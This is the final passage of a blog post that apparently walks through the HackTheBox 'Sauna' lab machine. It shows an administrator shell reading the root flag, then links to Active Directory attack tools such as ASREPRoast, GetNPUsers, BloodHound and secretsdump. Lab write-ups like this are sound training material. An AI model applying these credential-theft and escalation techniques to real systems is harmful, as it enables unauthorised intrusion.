class="line">C:\Windows\system32&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="Grab-the-root-txt"><a href="#Grab-the-root-txt" class="headerlink" title="Grab the root.txt"></a>Grab the root.txt</h3><p>Now that I’m the admin i can now get the <code>root.txt</code></p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">C:\Windows\system32&gt;cd \Users\Administrator\Desktop</span><br><span class="line"> </span><br><span class="line">C:\Users\Administrator\Desktop&gt;dir</span><br><span class="line"> Volume <span class="keyword">in</span> drive C has no label.</span><br><span class="line"> Volume Serial Number <span class="keyword">is</span> <span class="number">489</span>C-D8FC</span><br><span class="line"></span><br><span class="line"> Directory of C:\Users\Administrator\Desktop</span><br><span class="line"></span><br><span class="line"><span class="number">01</span>/<span class="number">23</span>/<span class="number">2020</span>  <span class="number">04</span>:<span class="number">11</span> PM    &lt;DIR&gt;          .</span><br><span class="line"><span class="number">01</span>/<span class="number">23</span>/<span class="number">2020</span>  <span class="number">04</span>:<span class="number">11</span> PM    &lt;DIR&gt;          ..</span><br><span class="line"><span class="number">01</span>/<span class="number">23</span>/<span class="number">2020</span>  <span class="number">11</span>:<span class="number">22</span> AM                <span class="number">32</span> root.txt</span><br><span class="line">               <span class="number">1</span> File(s)             <span class="number">32</span> bytes</span><br><span class="line">               <span class="number">2</span> Dir(s)   <span class="number">7</span>,<span class="number">681</span>,<span class="number">822</span>,<span class="number">720</span> bytes free</span><br><span class="line"></span><br><span class="line">C:\Users\Administrator\Desktop&gt;more root.txt</span><br><span class="line"><span class="number">04965</span>c68</span><br><span class="line"></span><br><span class="line">C:\Users\Administrator\Desktop&gt;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<hr>
<p>If you liked my writeup please leave a respect on my <a target="_blank" rel="noopener" href="https://www.hackthebox.eu/profile/128965">Profile</a></p>
<p><img src="https://www.hackthebox.eu/badge/image/128965" alt="Payas0" title="Payas0"></p>
<hr>
<p>Referrences:</p>
<p><a target="_blank" rel="noopener" href="https://github.com/HarmJ0y/ASREPRoast">ASREProast</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py">GetNPUsers</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/BloodHoundAD/BloodHound">BloodHound</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS">WinPEAS</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py">secretsdumps</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Quick-Summary"><span class="toc-number">1.</span> <span class="toc-text">Quick Summary</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Penetration-Testing-Methodologies"><span class="toc-number">2.</span> <span class="toc-text">Penetration Testing Methodologies</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Network-Scanning"><span class="toc-number">3.</span> <span class="toc-text">Network Scanning</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Walkthrough"><span class="toc-number">3.1.</span> <span class="toc-text">Walkthrough</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap-results"><span class="toc-number">3.2.</span> <span class="toc-text">Nmap results</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Enumeration"><span class="toc-number">4.</span> <span class="toc-text">Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#The-Sauna-Website"><span class="toc-number">4.1.</span> <span class="toc-text">The Sauna Website</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Post-Exploitation"><span class="toc-number">5.</span> <span class="toc-text">Post - Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Enumerationg-USERS"><span class="toc-number">5.1.</span> <span class="toc-text">Enumerationg USERS</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploitation"><span class="toc-number">6.</span> <span class="toc-text">Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Kerberos-Pre-Authentication"><span class="toc-number">6.1.</span> <span class="toc-text">Kerberos Pre-Authentication</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Grab-user-txt"><span class="toc-number">6.2.</span> <span class="toc-text">Grab user.txt</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">7.</span> <span class="toc-text">Privilege Escalation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Escalating-to-svc-loanmgr"><span class="toc-number">7.1.</span> <span class="toc-text">Escalating to svc_loanmgr</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Login-as-svc-loanmanager"><span class="toc-number">7.2.</span> <span class="toc-text">Login as svc_loanmanager</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Grab-the-root-txt"><span class="toc-number">7.3.</span> <span class="toc-text">Grab the root.txt</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&text=HackTheBox - Sauna 🔥💥"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&title=HackTheBox - Sauna 🔥💥"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&is_video=false&description=HackTheBox - Sauna 🔥💥"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox - Sauna 🔥💥&body=Check out this article: https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&title=HackTheBox - Sauna 🔥💥"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&title=HackTheBox - Sauna 🔥💥"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&title=HackTheBox - Sauna 🔥💥"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&title=HackTheBox - Sauna 🔥💥"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&name=HackTheBox - Sauna 🔥💥&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&t=HackTheBox - Sauna 🔥💥"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Information Security &#64; medz
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>

